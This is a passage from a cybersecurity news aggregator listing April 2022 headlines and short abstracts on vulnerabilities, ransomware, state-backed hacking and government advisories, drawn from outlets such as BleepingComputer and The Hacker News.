Abstract Pwn2Own Miami 2022 has ended with competitors earning $400,000 for 26 zero-day exploits (and several bug collisions) targeting ICS and SCADA products demoed during the contest between April 19 and April 21.

BleepingComputer

April 21, 2022 – Vulnerabilities

Access Bypass, Data Overwrite Vulnerabilities Patched in Drupal Full Text

Abstract The first of the bugs fixed with the latest iterations of the open-source CMS is an access bypass issue that exists because of an improperly implemented generic entity access API for entity revisions.

Security Week

April 21, 2022 – Vulnerabilities

Amazon’s Hotpatch for Log4j Flaw Found Vulnerable to Privilege Escalation Bug Full Text

Abstract The "hotpatch" released by Amazon Web Services (AWS) in response to the  Log4Shell  vulnerabilities could be leveraged for container escape and privilege escalation, allowing an attacker to seize control of the underlying host. "Aside from containers, unprivileged processes can also exploit the patch to escalate privileges and gain root code execution," Palo Alto Networks Unit 42 researcher Yuval Avrahami  said  in a report published this week. The issues —  CVE-2021-3100 ,  CVE-2021-3101 ,  CVE-2022-0070 , and  CVE-2022-0071  (CVSS scores: 8.8) — affect the  hotfix solutions  shipped by AWS, and stem from the fact that they are designed to search for Java processes and patch them against the Log4j flaw on the fly but without ensuring that the new Java processes are run within the restrictions imposed on the container. "Any process running a binary named 'java' – inside or outside of a container – is considered a candidate for the hot patch,"

The Hacker News

April 21, 2022 – Phishing

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Threat intelligence firm Resecurity details how crooks are delivering IRS tax scams and phishing attacks posing as government vendors. Cybercriminals are leveraging advanced tactics in their phishing-kits granting them a high delivery success rate...

Security Affairs

April 21, 2022 – Vulnerabilities

QNAP asks users to mitigate critical Apache HTTP Server bugs Full Text

Abstract QNAP has asked customers to apply mitigation measures to block attempts to exploit Apache HTTP Server security vulnerabilities impacting their network-attached storage (NAS) devices.

BleepingComputer

April 21, 2022 – Criminals

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes, and preparing for holidays (e.g., Easter), that’s why you need to be especially careful during these times.

Security Affairs

April 21, 2022 – Vulnerabilities

Unpatched Bug in RainLoop Webmail Could Give Hackers Access to all Emails Full Text

Abstract An unpatched high-severity security flaw has been disclosed in the open-source RainLoop web-based email client that could be weaponized to siphon emails from victims' inboxes. "The code vulnerability [...] can be easily exploited by an attacker by sending a malicious email to a victim that uses RainLoop as a mail client," SonarSource security researcher Simon Scannell  said  in a report published this week. "When the email is viewed by the victim, the attacker gains full control over the session of the victim and can steal any of their emails, including those that contain highly sensitive information such as passwords, documents, and password reset links." Tracked as CVE-2022-29360, the flaw relates to a stored cross-site-scripting (XSS) vulnerability impacting the latest version of RainLoop ( v1.16.0 ) that was released on May 7, 2021. Stored XSS flaws, also called persistent XSS, occur when a malicious script is injected directly into a target web applic

The Hacker News

April 21, 2022 – Vulnerabilities

Static SSH host key in Cisco Umbrella allows stealing admin credentials Full Text

Abstract Cisco addressed a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA) that could allow stealing admin credentials. Cisco addressed a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA), tracked as CVE-2022-20773,...

Security Affairs

April 21, 2022 – Vulnerabilities

Critical bug in Android could allow access to users’ media files Full Text

Abstract Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC).

BleepingComputer

April 21, 2022 – Government

Ukraine Ramps Up Cyber Defenses to Slow Surge in Attacks Full Text

Abstract Ukraine is now issuing physical security keys to as many government agencies as possible, said Oleksandr Potii, deputy chief of the State Service of Special Communication and Information Protection.

Bloomberg Quint

April 21, 2022 – Vulnerabilities

Critical Chipset Bugs Open Millions of Android Devices to Remote Spying Full Text

Abstract Three security vulnerabilities have been disclosed in the audio decoders of Qualcomm and MediaTek chips that, if left unresolved, could allow an adversary to remotely gain access to media and audio conversations from affected mobile devices. According to Israeli cybersecurity company Check Point , the issues could be used as a launchpad to carry out remote code execution (RCE) attacks simply by sending a specially crafted audio file. "The impact of an RCE vulnerability can range from malware execution to an attacker gaining control over a user's multimedia data, including streaming from a compromised machine's camera," the researchers said in a report shared with The Hacker News. "In addition, an unprivileged Android app could use these vulnerabilities to escalate its privileges and gain access to media data and user conversations." The vulnerabilities are rooted in an audio coding format originally developed and open-sourced by Apple in 2011. Called t

The Hacker News

April 21, 2022 – Vulnerabilities

CVE-2022-20685 flaw in the Modbus preprocessor of the Snort makes it unusable Full Text

Abstract CVE-2022-20685 flaw in the Modbus preprocessor of the Snort detection engine could trigger a DoS condition and make it ineffective against malicious traffic. Snort is a free open source network intrusion detection system (IDS)...

Security Affairs

April 21, 2022 – Attack

GitHub restores popular Python repo hit by bogus DMCA takedown Full Text

Abstract Yesterday, following a DMCA complaint, GitHub took down a repository that hosts the official SymPy project documentation website. It turns out the DMCA notice filed by HackerRank's representatives was sent out in error and generated much backlash from the open source community. The DMCA notice has since been rescinded.

BleepingComputer

April 21, 2022 – Criminals

REvil’s Tor Servers are Active Again Full Text

Abstract REvil ransomware’s servers in the Tor network are active again after months of inactivity. At present, these servers are redirecting users to a new operation that is believed to have started in mid-December 2021.

Cyware Alerts - Hacker News

April 21, 2022 – Ransomware

New Incident Report Reveals How Hive Ransomware Targets Organizations Full Text

Abstract A recent Hive ransomware attack carried out by an affiliate involved the exploitation of "ProxyShell" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network. "The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise," Varonis security researcher, Nadav Ovadia,  said  in a post-mortem analysis of the incident.  Hive, which was  first observed  in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks. ProxyShell  — tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 — involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker

The Hacker News

April 21, 2022 – Government

US, Australia, Canada, New Zealand, and the UK warn of Russia-linked threat actors’ attacks Full Text

Abstract Cybersecurity agencies of the Five Eyes intelligence alliance warn of cyberattacks conducted by Russia-linked threat actors on critical infrastructure. Cybersecurity agencies of the Five Eyes intelligence alliance (United States, Australia, Canada,...

Security Affairs

April 21, 2022 – Vulnerabilities

Cisco Umbrella default SSH key allows theft of admin credentials Full Text

Abstract Cisco has released security updates to address a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA), allowing unauthenticated attackers to steal admin credentials remotely.

BleepingComputer

April 21, 2022 – Malware

Freely-Distributed Ginzo Stealer Malware Pilfers Browser Data, Discord Tokens, and Crypto Wallets Full Text

Abstract Ginzo stealer is obfuscated with ConfuserEx, resulting in error messages when trying to decompile the code. That is because the type initializer .cctor decrypts the actual code on the fly. It also initializes data required for string decryption.

G-Data Security Blog

April 21, 2022 – Government

FBI: BlackCat ransomware breached at least 60 entities worldwide Full Text

Abstract The Federal Bureau of Investigation (FBI) says the Black Cat ransomware gang, also known as ALPHV, has breached the networks of at least 60 organizations worldwide, between November 2021 and March 2022.

BleepingComputer

April 21, 2022 – Government

Australia: AUSTRAC outlines how to spot ransomware and detect abuse of digital currencies Full Text

Abstract Australia's financial intelligence and regulatory body Austrac has released two financial crime guides to help businesses detect and prevent criminal abuse of digital currencies and ransomware.

ZDNet

April 21, 2022 – General

Breaches by the numbers: Why adapting to regional challenges is imperative Full Text

Abstract According to a new Forrester survey, 63% of organizations were breached in the past year, 4% more than the year before. In the past 12 months, organizations faced an average of three breaches.

ZDNet

April 20, 2022 – Government

Five Eyes Nations Warn of Russian Cyber Attacks Against Critical Infrastructure Full Text

Abstract The Five Eyes nations have released a  joint cybersecurity advisory  warning of increased  malicious attacks  from Russian state-sponsored actors and criminal groups targeting critical infrastructure organizations amidst the ongoing military siege on Ukraine. "Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks," authorities from Australia, Canada, New Zealand, the U.K., and the U.S.  said . "Russia's invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as material support provided by the United States and U.S. allies and partners." The  advisory  follows  another alert  from the U.S. government cautioning of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control an

The Hacker News

April 20, 2022 – Criminals

REvil’s TOR sites come alive to redirect to new ransomware operation Full Text

Abstract REvil ransomware's servers in the TOR network are back up after months of inactivity and redirect to a new operation that appears to have started since at least mid-December last year.

BleepingComputer

April 20, 2022 – Malware

Inno Stealer - Fake Windows 11 Upgrade Spreads Infostealer Full Text

Abstract The new infostealer malware targets various web browsers and crypto wallets such as Chrome, Brave, Comodo, Opera, Vivaldi, Edge, 360 Browser, GeroWallet, BraveWallet, and GuildWallet.

Cyware Alerts - Hacker News

April 20, 2022 – Vulnerabilities

Google Project Zero Detects a Record Number of Zero-Day Exploits in 2021 Full Text

Abstract Google Project Zero called 2021 a "record year for in-the-wild 0-days," as  58 security vulnerabilities  were detected and disclosed during the course of the year. The development marks more than a two-fold jump from the previous maximum when 28 0-day exploits were tracked in 2015. In contrast, only 25 0-day exploits were detected in 2020. "The large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits," Google Project Zero security researcher  Maddie Stone   said . "Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces," Stone added. The tech giant's in-house security team characterized the exploits as similar to previous and publicly known vulnerabilities, with only two of them markedly different for the technical sophistication and use of logic bugs to escape the sandbox. B

The Hacker News

April 20, 2022 – APT

Russian Gamaredon APT continues to target Ukraine Full Text

Abstract Russia-linked threat actor Gamaredon targets Ukraine with new variants of the custom Pterodo backdoor. Russia-linked Gamaredon APT group (a.k.a. Armageddon, Primitive Bear, and ACTINIUM) continues to target Ukraine and it is using new variants...

Security Affairs

April 20, 2022 – Breach

Microsoft Exchange servers hacked to deploy Hive ransomware Full Text

Abstract A Hive ransomware affiliate has been targeting Microsoft Exchange servers vulnerable to ProxyShell security issues to deploy various backdoors, including Cobalt Strike beacon.

BleepingComputer

April 20, 2022 – Ransomware

Night Sky Ransomware’s Ride From Dusk Till Dawn Full Text

Abstract A recent report by Vedere Labs provides several details about Night Sky, whose samples were first spotted in January during a short campaign that targeted two victims from Bangladesh and Japan. 

Cyware Alerts - Hacker News

April 20, 2022 – Vulnerabilities

Researchers Detail Bug That Could Paralyze Snort Intrusion Detection System Full Text

Abstract Details have emerged about a now-patched security vulnerability in the Snort intrusion detection and prevention system that could trigger a denial-of-service (DoS) condition and render it powerless against malicious traffic. Tracked as  CVE-2022-20685 , the vulnerability is rated 7.5 for severity and resides in the Modbus preprocessor of the Snort detection engine. It affects all open-source Snort project releases earlier than 2.9.19 as well as version 3.1.11.0. Maintained by Cisco,  Snort  is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that offers real-time network traffic analysis to spot potential signs of malicious activity based on predefined rules. "The vulnerability, CVE-2022-20685, is an integer-overflow issue that can cause the Snort Modbus OT preprocessor to enter an infinite  while loop ," Uri Katz, a security researcher with Claroty,  said  in a report published last week. "A successful exploit keeps Snort from p

The Hacker News

April 20, 2022 – Breach

Anonymous hacked other Russian organizations, some of the breaches could be severe Full Text

Abstract The Anonymous collective and affiliate groups intensify their attacks and claimed to have breached multiple organizations. Anonymous and groups linked to the famous collective continues to target Russian organizations, the hacktivist are breaching...

Security Affairs

April 20, 2022 – Government

FBI warns of ransomware attacks targeting US agriculture sector Full Text

Abstract The US Federal Bureau of Investigation (FBI) warned Food and Agriculture (FA) sector organizations today of an increased risk that ransomware gangs "may be more likely" to attack them during the harvest and planting seasons.

BleepingComputer

April 20, 2022 – Botnet

BotenaGo’s New Avatar Targets Lilin DVR Devices Full Text

Abstract In October 2021, the source code of BotenaGo was leaked, leading to the creation of newer variants based on the original. Since then, researchers have observed various variants of BotenaGo.

Cyware Alerts - Hacker News

April 20, 2022 – Education

[eBook] The Ultimate Security for Management Presentation Template Full Text

Abstract Are you a CISO, CIO, or IT Director? In your role, you're responsible for breach protection – which means you oversee and govern the process of designing, building, maintaining, and continuously enhancing your organization's security program.  But getting buy-in from leadership can be difficult when they are a non-technical audience. On top of managing your organization's breach protection activity 24/7, you have to find time to figure out how to effectively articulate the risks, potential impacts, and appropriate steps necessary in a way that will convince leadership to invest in the resources required to keep your organization safe. Compounding this is the fact that, while you are focused on things like malware, exploits, and network traffic – your leadership is primarily concerned with operational loss and calculated risk.  How do you bridge the gap and help leadership understand your priorities and your team's business impact? You must identify the security i

The Hacker News

April 20, 2022 – Government

CISA adds Windows Print Spooler to its Known Exploited Vulnerabilities Catalog Full Text

Abstract US Critical Infrastructure Security Agency (CISA) adds a Windows Print Spooler vulnerability to its Known Exploited Vulnerabilities Catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added the Windows Print Spooler, tracked as CVE-2022-22718,...

Security Affairs

April 20, 2022 – Government

US and allies warn of Russian hacking threat to critical infrastructure Full Text

Abstract Today, Five Eyes cybersecurity authorities warned critical infrastructure network defenders of an increased risk that Russia-backed hacking groups could target organizations within and outside Ukraine's borders.

BleepingComputer

April 20, 2022 – Government

FBI Warns of Ransomware Attacks on Farming Co-ops During Planting, Harvest Seasons Full Text

Abstract While some of the incidents resulted in only administrative operations getting disrupted, others affected production. In some of the attacks reported in September and October 2021, the victim had to completely shut down production.

Security Week

April 20, 2022 – Malware

New BotenaGo variant specifically targets Lilin security camera DVR devices Full Text

Abstract Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and has a zero-detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T, the malicious code leverages...

Security Affairs

April 20, 2022 – Breach

Okta: Lapsus$ breach lasted only 25 minutes, hit 2 customers Full Text

Abstract Identity and access management firm Okta says an investigation into the January Lapsus$ breach concluded the incident's impact was significantly smaller than expected.

BleepingComputer

April 20, 2022 – Business

ThreatLocker Scores $100M in Funding Led by General Atlantic, Zeroes in on $1B Unicorn Valuation Full Text

Abstract ThreatLocker, which provides zero trust policy-driven security for endpoints, has scored $100 million in Series C funding led by private equity powerhouse and growth equity investor General Atlantic.

CRN

April 20, 2022 – Vulnerabilities

QNAP users are recommended to disable UPnP port forwarding on routers Full Text

Abstract QNAP urges customers to disable Universal Plug and Play (UPnP) port forwarding on their routers to secure their NAS devices. Taiwanese vendor QNAP urges customers to disable Universal Plug and Play (UPnP) port forwarding on their routers to protect...

Security Affairs

April 20, 2022 – Vulnerabilities

Microsoft Defender flags Google Chrome updates as suspicious Full Text

Abstract Microsoft Defender for Endpoint has been tagging Google Chrome updates delivered via Google Update as suspicious activity due to a false positive issue.

BleepingComputer

April 20, 2022 – Phishing

Watch out for Ukraine donation scammers in Twitter replies Full Text

Abstract The invasion of Ukraine has been a money-making opportunity for scammers since the moment it began: Fake donation sites, bogus Red Cross portals, phishing pages, the works.

Malwarebytes Labs

April 20, 2022 – Attack

Russian state hackers hit Ukraine with new malware variants Full Text

Abstract Threat analysts report the activity of the Russian state-sponsored threat group known as Gamaredon (Armageddon, Shuckworm), is still notably active in Ukrainian computer networks.

BleepingComputer

April 20, 2022 – General

Cyber innovation is the need of the hour to help organizations adopt new security technologies Full Text

Abstract By leveraging automation technologies, security teams can facilitate the coordination and execution of different security processes among different security functions and across their technology stack.

Banking and Finance Post

April 20, 2022 – Vulnerabilities

Amazon Web Services fixes container escape in Log4Shell hotfix Full Text

Abstract Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.

BleepingComputer

April 20, 2022 – Education

Why you shouldn’t automate your VirusTotal uploads Full Text

Abstract While there may be an occasional need to upload a file to VirusTotal, experts suggest not automating this procedure. Rather, only use it when you have no other methods of checking whether an attachment is safe to open.

Malwarebytes Labs

April 20, 2022 – Attack

Shuckworm Espionage Group Continues Pterodo Backdoor Campaign Against Ukraine Full Text

Abstract The Russia-linked Shuckworm (aka Gamaredon) group is continually refining its malware and often deploying multiple payloads to maximize the chances of maintaining a persistent presence on targeted networks.

Symantec

April 19, 2022 – Breach

Okta Says Security Breach by Lapsus$ Hackers Impacted Only Two of Its Customers Full Text

Abstract Identity and access management provider Okta on Tuesday said it concluded its probe into the  breach  of a third-party vendor in late January 2022 by the LAPSUS$ extortionist gang. Stating that the "impact of the incident was significantly less than the maximum potential impact" the company had previously shared last month, Okta  said  the intrusion impacted only two customer tenants, down from 366 as was initially assumed. The  security event  took place on January 21 when the LAPSUS$ hacking group gained unauthorized remote access to a workstation belonging to a Sitel support engineer. But it only became public knowledge nearly two months later when the adversary  posted  screenshots of Okta's internal systems on their Telegram channel. In addition to accessing two active customer tenants within the SuperUser application — which is used to perform basic management functions — the hacker group is said to have viewed limited additional information in other applicatio

The Hacker News

April 19, 2022 – Vulnerabilities

Hackers Exploiting Recently Reported Windows Print Spooler Vulnerability in the Wild Full Text

Abstract A security flaw in the Windows Print Spooler component that was patched by Microsoft in February is being actively exploited in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned . To that end, the agency has added the shortcoming to its Known Exploited Vulnerabilities Catalog , requiring Federal Civilian Executive Branch (FCEB) agencies to address the issues by May 10, 2022. Tracked as CVE-2022-22718 (CVSS score: 7.8), the security vulnerability is one among the four privilege escalation flaws in the Print Spooler that Microsoft resolved as part of its Patch Tuesday updates on February 8, 2022. It's worth noting that the Redmond-based tech giant has remediated a number of Print Spooler flaws since the critical PrintNightmare remote code execution vulnerability came to light last year, including 15 elevation of privilege vulnerabilities in April 2022. Specifics about the nature of the attacks and the identity of the threat actors that m

The Hacker News

April 19, 2022 – General

CISA warns of attackers now exploiting Windows Print Spooler bug Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added three new security flaws to its list of actively exploited bugs, including a local privilege escalation bug in the Windows Print Spooler.

BleepingComputer

April 19, 2022 – Attack

Attacks Against DeFi Protocols Surge Full Text

Abstract Last year, more than $3 billion worth of digital assets were stolen. In Q1 2022, over $1.3 billion has already been stolen, indicating that the path taken by cybercriminals is even more aggressive this year.

Cyware Alerts - Hacker News

April 19, 2022 – Vulnerabilities

New Lenovo UEFI Firmware Vulnerabilities Affect Millions of Laptops Full Text

Abstract Three high-impact Unified Extensible Firmware Interface (UEFI) security vulnerabilities have been discovered impacting various Lenovo consumer laptop models, enabling malicious actors to deploy and execute firmware implants on the affected devices. Tracked as CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972, the latter two "affect firmware drivers originally meant to be used only during the manufacturing process of Lenovo consumer notebooks," ESET researcher Martin Smolár  said  in a report published today. "Unfortunately, they were mistakenly included also in the production BIOS images without being properly deactivated," Smolár added. Successful exploitation of the flaws could permit an attacker to disable SPI flash protections or Secure Boot, effectively granting the adversary the ability to install persistent malware that can survive system reboots. CVE-2021-3970, on the other hand, relates to a case of memory corruption in the System Management Mode ( SMM

The Hacker News

April 19, 2022 – Vulnerabilities

ESET warns of three flaws that affect over 100 Lenovo notebook models Full Text

Abstract Lenovo warns of vulnerabilities in its Unified Extensible Firmware Interface (UEFI) shipped with at least 100 notebook models. Lenovo has published a security advisory to warn customers of vulnerabilities that affect its Unified Extensible Firmware...

Security Affairs

April 19, 2022 – Education

Protect Your Executives’ Cybersecurity Amidst Global Cyberwar Full Text

Abstract In this time of unprecedented cyberwar, organizations must protect the personal digital lives of their executives in order to reduce the company’s risk of direct or collateral damage.

Threatpost

April 19, 2022 – Botnet

Emotet botnet switches to 64-bit modules, increases activity Full Text

Abstract The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines.

BleepingComputer

April 19, 2022 – Malware

New SolarMarker Variant with Improved Evasion Tactics Full Text

Abstract SolarMarker operators were observed using signed files, obfuscated PowerShell scripts, large files, and impersonation of legitimate software installers to stay undetected.

Cyware Alerts - Hacker News

April 19, 2022 – Attack

Experts Uncover Spyware Attacks Against Catalan Politicians and Activists Full Text

Abstract A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from  NSO Group  and  Candiru  against at least 65 individuals as part of a "multi-year clandestine operation." "Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab  said  in a new report. "Family members were also infected in some cases." Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020. The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.

The Hacker News

April 19, 2022 – Ransomware

Kaspersky releases a free decryptor for Yanluowang ransomware Full Text

Abstract Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that allows victims to recover their files for free. Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that...

Security Affairs

April 19, 2022 – Vulnerabilities

QNAP urges customers to disable UPnP port forwarding on routers Full Text

Abstract Taiwanese hardware vendor QNAP urged customers on Monday to disable Universal Plug and Play (UPnP) port forwarding on their routers to prevent exposing their network-attached storage (NAS) devices to attacks from the Internet.

BleepingComputer

April 19, 2022 – General

Banking, Crypto, and Other Scams Muddy the Cyberspace Full Text

Abstract In 2021, approximately 20,000 people fell victim to RAT scams, as per a report by the U.K's Action Fraud. Collectively, they lost $75 million. The U.S. lost around $2.4 billion to BEC scams in 2021, a 33% increase from 2020.

Cyware Alerts - Hacker News

April 19, 2022 – Privacy

NSO Group Pegasus spyware leverages new zero-click iPhone exploit in recent attacks Full Text

Abstract Researchers reported that threat actors leveraged a new zero-click iMessage exploit to install NSO Group Pegasus on iPhones belonging to Catalans. Researchers from Citizen Lab have published a report detailing the use of a new zero-click iMessage...

Security Affairs

April 19, 2022 – Vulnerabilities

Microsoft disables SMB1 by default for Windows 11 Home Insiders Full Text

Abstract Microsoft announced today that the 30-year-old SMBv1 file-sharing protocol is now disabled by default on Windows systems running the latest Windows 11 Home Dev channel builds, the last editions of Windows or Windows Server that still came with SMBv1 enabled.

BleepingComputer

April 19, 2022 – Attack

New IcedID Malware Campaign Targets Ukrainian Government Full Text

Abstract The targeted intrusions are a part of hostile activities against the nation since the year started. As per CERT-UA, the country has suffered 362 cyberattacks since the invasion.

Cyware Alerts - Hacker News

April 19, 2022 – Malware

New SolarMarker variant upgrades evasion abilities to avoid detection Full Text

Abstract Researchers disclosed a new variant of the SolarMarker malware that implements new techniques to avoid detection. Cybersecurity researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new features to avoid...

Security Affairs

April 19, 2022 – Solution

Real-time voice concealment algorithm blocks microphone spying Full Text

Abstract Columbia University researchers have developed a novel algorithm that can block rogue audio eavesdropping via microphones in smartphones, voice assistants, and IoTs in general.

BleepingComputer

April 19, 2022 – Privacy

Watchdog warned UK government of spyware infections inside 10 Downing Street Full Text

Abstract "We confirm that in 2020 and 2021 we observed and notified the government of the United Kingdom of multiple suspected instances of Pegasus spyware infections within official UK networks," Citizen Lab said in a blog post.

Reuters

April 19, 2022 – Criminals

Crooks steal $182 million from Beanstalk DeFi platform Full Text

Abstract Credit-based stablecoin protocol Beanstalk discloses a security breach that resulted in the loss of all of its $182 million. The decentralized, credit-based finance system Beanstalk suffered a security breach that resulted in financial losses...

Security Affairs

April 19, 2022 – Breach

GitHub notifies owners of private repos stolen using OAuth tokens Full Text

Abstract GitHub says it notified all organizations believed to have had data stolen from their private repositories by attackers abusing compromised OAuth user tokens issued to Heroku and Travis-CI.

BleepingComputer

April 19, 2022 – Vulnerabilities

Google fixes Chrome zero day being used in exploits in the wild Full Text

Abstract Google hasn't revealed any details about it besides that it was a type confusion in Chrome's V8 JavaScript engine. "Google is aware that an exploit for CVE-2022-1364 exists in the wild," the company says.

ZDNet

April 19, 2022 – Education

How to protect your ADFS from password spraying attacks Full Text

Abstract Microsoft recommends a multi-tiered approach for securing your ADFS environment from password attacks. Learn how Specops can fill in the gaps to add further protection against password sprays and other password attacks.

BleepingComputer

April 19, 2022 – Ransomware

Night Sky: A Short-Lived Threat from a Long-Lived Threat Actor Full Text

Abstract Night Sky was discovered to be a fork of a ransomware family called Rook, which was itself derived from the leaked source code of Babuk and deployed by the same threat actor that used LockFile and AtomSilo, which share the same decryption tool.

Forescout

April 19, 2022 – Malware

New stealthy BotenaGo malware variant targets DVR devices Full Text

Abstract Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it's the stealthiest seen so far, running undetected by any anti-virus engine.

BleepingComputer

April 19, 2022 – Ransomware

Conti Ransomware’s Toll on the Healthcare Industry – Krebs on Security Full Text

Abstract According to recently revealed information, Conti has launched more than 200 attacks against hospitals and other healthcare facilities since first surfacing in 2018 under its earlier name, “Ryuk.”

Krebs on Security

April 19, 2022 – Vulnerabilities

Lenovo UEFI firmware driver bugs affect over 100 laptop models Full Text

Abstract Lenovo has published a security advisory on vulnerabilities that impact its Unified Extensible Firmware Interface (UEFI) loaded on at least 100 of its laptop models.

BleepingComputer

April 19, 2022 – Outage

WH Smith Subsidiary Funky Pigeon Halts All Customer Orders After Security Incident Full Text

Abstract London Stock Exchange-listed WH Smith issued a statement to the market admitting Funky Pigeon was "subject to a cyber security incident affecting part of its systems on Thursday 14 April 2022."

The Register

April 19, 2022 – Phishing

LinkedIn brand takes lead as most impersonated in phishing attacks Full Text

Abstract Security researchers are warning that LinkedIn has become the most spoofed brand in phishing attacks, accounting for more than 52% of all such incidents at a global level.

BleepingComputer

April 18, 2022 – Government

FBI, U.S. Treasury and CISA Warn of North Korean Hackers Targeting Blockchain Companies Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI) and the Treasury Department, warned of a new set of ongoing cyber attacks carried out by the Lazarus Group targeting blockchain companies. Calling the activity cluster  TraderTraitor , the infiltrations involve the North Korean state-sponsored advanced persistent threat (APT) actor striking entities operating in the Web3.0 industry since at least 2020. Targeted organizations include cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs). The attack chains commence with the threat actor reaching out to victims via different communication platforms to lure them into downloading weaponized cryptocurrency apps for Windows and macOS, subse

The Hacker News

April 18, 2022 – Breach

GitHub Notifies Victims Whose Private Data Was Accessed Using OAuth Tokens Full Text

Abstract GitHub on Monday noted that it had notified all victims of an attack campaign, which involved an unauthorized party downloading private repository contents by taking advantage of third-party OAuth user tokens maintained by Heroku and Travis CI. "Customers should also continue to monitor Heroku and Travis CI for updates on their own investigations into the affected OAuth applications," the company  said  in an updated post. The  incident  originally came to light on April 12 when GitHub uncovered signs that a malicious actor had leveraged the stolen OAuth user tokens issued to Heroku and Travis-CI to download data from dozens of organizations, including NPM. The Microsoft-owned platform also said that it will alert customers promptly should the ongoing investigation identify additional victims. Additionally, it cautioned that the adversary may also be digging into the repositories for secrets that could be used in other attacks. Heroku, which has pulled support for GitHu

The Hacker News

April 18, 2022 – Breach

Beanstalk DeFi platform loses $182 million in flash-loan attack Full Text

Abstract The decentralized, credit-based finance system Beanstalk disclosed on Sunday that it suffered a security breach that resulted in financial losses of $182 million, the attacker stealing $80 million in crypto assets.

BleepingComputer

April 18, 2022 – Cryptocurrency

US warns of Lazarus hackers using malicious cryptocurrency apps Full Text

Abstract CISA, the FBI, and the US Treasury Department warned today that the North Korean Lazarus hacking group is targeting organizations in the cryptocurrency and blockchain industries with trojanized cryptocurrency applications.

BleepingComputer

April 18, 2022 – Criminals

Conti’s Extended Connections with Karakurt Revealed Full Text

Abstract Researchers were able to gain access to an internal Conti VPS server, with the credentials of a user, allegedly the leader of the cybercrime enterprise. This resulted in several revelations about its connection with other groups.

Cyware Alerts - Hacker News

April 18, 2022 – Criminals

Researchers Share In-Depth Analysis of PYSA Ransomware Group Full Text

Abstract An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly. "The group is known to carefully research high-value targets before launching its attacks, compromising enterprise systems and forcing organizations to pay large ransoms to restore their data," Swiss cybersecurity company PRODAFT  said  in an exhaustive report published last week. PYSA, short for "Protect Your System, Amigo" and a successor of the Mespinoza ransomware, was first observed in December 2019 and has emerged as the third most prevalent ransomware strain detected during the fourth quarter of 2021. Since September 2020,

The Hacker News

April 18, 2022 – Policy and Law

Call for Papers: Cybersecurity Law and Policy Scholars Conference 2022 Full Text

Abstract The second annual Cybersecurity Law and Policy Scholars Conference (CLPSC) will take place at the University of Minnesota Law School on September 23-24, 2022.

Lawfare

April 18, 2022 – Criminals

Experts spotted Industrial Spy, a new stolen data marketplace Full Text

Abstract A new marketplace named Industrial Spy that focuses on the sale of stolen data appeared in the threat landscape. Malware HunterTeam and Bleeping Computer reported the born of a new marketplace called Industrial Spy that sells stolen data and offers...

Security Affairs

April 18, 2022 – Hacker

Cyberattackers Put the Pedal to the Medal: Podcast Full Text

Abstract Fortinet’s Derek Manky discusses the exponential increase in the speed that attackers weaponize fresh vulnerabilities, where botnets and offensive automation fit in, and the ramifications for security teams.

Threatpost

April 18, 2022 – Ransomware

Free decryptor released for Yanluowang ransomware victims Full Text

Abstract Kaspersky today revealed it found a vulnerability in Yanluowang ransomware's encryption algorithm, which makes it possible to recover files it encrypts.

BleepingComputer

April 18, 2022 – Criminals

Lazarus Eyes Chemical Sector in South Korea Full Text

